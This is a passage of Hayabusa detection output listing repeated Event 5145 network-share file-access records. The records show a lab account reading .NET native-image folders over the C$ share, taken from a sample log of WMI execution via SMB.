Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx : IP 
Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics : IP Address: 